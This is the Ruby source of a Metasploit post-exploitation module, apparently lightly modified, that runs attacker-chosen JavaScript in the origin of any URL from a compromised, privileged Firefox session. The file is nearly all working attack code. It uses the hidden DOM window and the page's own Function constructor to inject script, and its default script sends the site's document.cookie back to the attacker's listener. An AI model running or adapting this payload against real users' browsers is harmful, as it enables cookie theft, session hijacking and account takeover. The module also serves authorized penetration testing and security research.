GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/firefox/gather/xss.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'json'
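# Post module that executes operator-supplied JavaScript inside the origin of a
# chosen URL, using a Firefox privileged (chrome) session.
#
# Flow (all of it lives in the JS string built by #js_payload):
#   1. grab the hidden DOM window from nsIAppShellService,
#   2. reset it to about:blank, plant a random expando property on it,
#   3. navigate it to URL and poll until the expando disappears (i.e. the
#      window global was replaced by the new document),
#   4. after a short settle delay, compile SCRIPT with the *page's* own
#      `Function` (via wrappedJSObject) so it runs in the page origin, and
#      hand it the chrome-side `send` callback to return data.
#
# Changes versus the original:
#   * SCRIPTFILE was registered but never read; it is now honoured and takes
#     precedence over SCRIPT when set.
#   * URL was interpolated verbatim into a double-quoted JS literal, so a value
#     containing `"` or `\` would break (or alter) the generated payload. It is
#     now JSON-encoded the same way SCRIPT already was.
class MetasploitModule < Msf::Post
  include Msf::Payload::Firefox
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Firefox XSS',
        'Description' => %q{
          This module runs the provided SCRIPT as javascript in the
          origin of the provided URL. It works by navigating to a hidden
          ChromeWindow to the URL, then injecting the SCRIPT with Function().
          The callback "send(result)" is used to send data back to the listener.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'joev' ],
        'Platform' => [ 'firefox' ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    # TIMEOUT is not read in this file; it is expected to be consumed by the
    # js_exec helper from the FirefoxPrivilegeEscalation mixin — verify there.
    register_options([
      OptString.new('SCRIPT', [true, 'The javascript command to run', 'send(document.cookie)']),
      OptPath.new('SCRIPTFILE', [false, 'The javascript file to run']),
      OptString.new('URL', [
        true, 'URL to inject into', 'https://metasploit.com'
      ]),
      OptInt.new('TIMEOUT', [true, 'Maximum time (seconds) to wait for a response', 90])
    ])
  end

  # Entry point: ships the chrome-side payload to the session and prints
  # whatever the injected script passed to send(). An empty reply (the
  # script never called send, or the wait ran out) is reported as an error.
  def run
    results = js_exec(js_payload)
    if results.present?
      print_good results
    else
      print_error 'No response received'
    end
  end

  # JavaScript to inject, stripped of surrounding whitespace.
  #
  # SCRIPTFILE, when set, wins over SCRIPT. OptPath validates that the path
  # exists at option-set time, so File.read is expected to succeed here; a
  # read failure propagates as a normal exception rather than being masked.
  #
  # @return [String] the script body
  def script_source
    path = datastore['SCRIPTFILE']
    raw = path.present? ? ::File.read(path) : datastore['SCRIPT'].to_s
    raw.strip
  end

  # Builds the JavaScript that runs in the privileged Firefox session.
  #
  # Both operator-controlled strings (the script and the URL) are embedded as
  # JSON object literals and then dereferenced, so quotes, backslashes and
  # newlines can never terminate the enclosing JS literal. The object wrapper
  # is kept (rather than generating a bare string) for compatibility with
  # older json gems that refuse to generate top-level scalars.
  #
  # The script is compiled with the page's own Function constructor obtained
  # through wrappedJSObject, so it executes in the content compartment of URL
  # and not with chrome privileges; the chrome-side `send` callback is passed
  # in as its only argument so the page-origin code can report back.
  #
  # @return [String] the payload source
  def js_payload
    src_literal = JSON.generate({ src: script_source })
    url_literal = JSON.generate({ url: datastore['URL'].to_s })
    %|

(function(send){
  #{set_timeout_source}

  var hiddenWindow = Components.classes["@mozilla.org/appshell/appShellService;1"]
    .getService(Components.interfaces.nsIAppShellService)
    .hiddenDOMWindow;

  hiddenWindow.location = 'about:blank';
  var src = (#{src_literal}).src;
  var url = (#{url_literal}).url;
  var key = "#{Rex::Text.rand_text_alphanumeric(8..19)}";

  // The expando vanishes once navigation swaps in a fresh window global;
  // that is the signal that the target document is in place.
  hiddenWindow[key] = true;
  hiddenWindow.location = url;

  // NOTE(review): this poll has no upper bound of its own; if the navigation
  // never completes it relies on the listener-side TIMEOUT to give up.
  var evt = function() {
    if (hiddenWindow[key]) {
      setTimeout(evt, 200);
    } else {
      setTimeout(function(){
        try {
          send(hiddenWindow.wrappedJSObject.Function('send', src)(send));
        } catch (e) {
          send("Error: "+e.message);
        }
      }, 500);
    }
  };

  setTimeout(evt, 200);
})(this.send);

|.strip
  end
end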